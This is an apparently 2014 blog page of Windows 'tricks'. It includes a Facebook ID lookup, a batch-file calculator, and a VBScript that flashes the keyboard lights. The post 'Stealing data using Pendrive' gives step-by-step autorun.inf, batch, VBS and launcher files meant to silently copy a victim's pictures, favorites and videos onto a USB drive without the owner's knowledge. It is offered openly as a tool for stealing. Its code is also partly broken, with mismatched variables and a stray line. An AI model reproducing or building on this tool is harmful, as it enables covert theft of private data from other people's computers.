Wednesday, 26 March 2014

Facebook unique ID

Find your unique facebook id:
https://graph.facebook.com/pinnamaneni.chowdary
replace pinnamaneni.chowdary by your own


ctrl+shift+k
and then enter the below code


javascript:Chat.openTab(100002057574987)





Sunday, 9 March 2014

Stealing data using Pendrive

Copy Data from other computers by using USB or Pendrive.

We are often curious to know about the Data and Files which is in others Computer but we are not allowed to do so due to restrictions by the Computer owner or of some other Reason.

This Trick could prove to be very helpful and it would Copy and Steal all the Data without the Confirmation and Knowing of Computer Owner.

Just follow these simple Steps :

1. Open Notepad.

Copy and Paste the following Code into Notepad :
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save this file as autorun.inf

2. Open New Notepad again.

Copy and Paste the following Code :
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off
cls

Save this file as File.bat

3. Open Notepad again.

Copy and Paste the following Code :

CreateObject("Wscript.Shell").
Run """" & WScript.Arguments(0) & """", 0, False

Save this file as Invisible.vbs

4. Now again open Notepad.
Now Copy and Paste the following Code :

wscript.exe \invisible.vbs file.bat

Save this as Launch.bat.

Now Copy and Paste all the four (4) files created in the above steps to the USB or Pendrive.
Create a folder named “Data” where the Stolen contents would be Copied automatically.
Now it is done. The USB or Pendrive is ready to Steal the Secret Data or Files.

Friday, 7 March 2014

Create your own calculator

Open a notepad (or any other text editor) file and paste the following code in it:
Code:
@ECHO OFF
color 2a
title My Calculator
pause
ECHO ---------------------------------------- -------
ECHO * = MULTIPLY
ECHO + = ADD
ECHO - = SUBTRACT
ECHO / =DIVIDE
ECHO ---------------------------------------- -------
pause

:loop
echo.
echo ---------------------------------------- -------
SET /p UDefine=
SET /a UDefine=%UDefine%
ECHO =
ECHO %UDefine%
ECHO.

Save the notepad file with a name say “calc.bat” or "Anynameyouwant.bat" where .bat is extension for batch files. Now click on the batch file icon and there opens your own calculator in command prompt window.

Saturday, 1 March 2014

Keyboard lighting Trick

Write the below code in the notepad and save it with .vbs extension and run it then your keyboard lights will dance...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop



{save it as .vbs}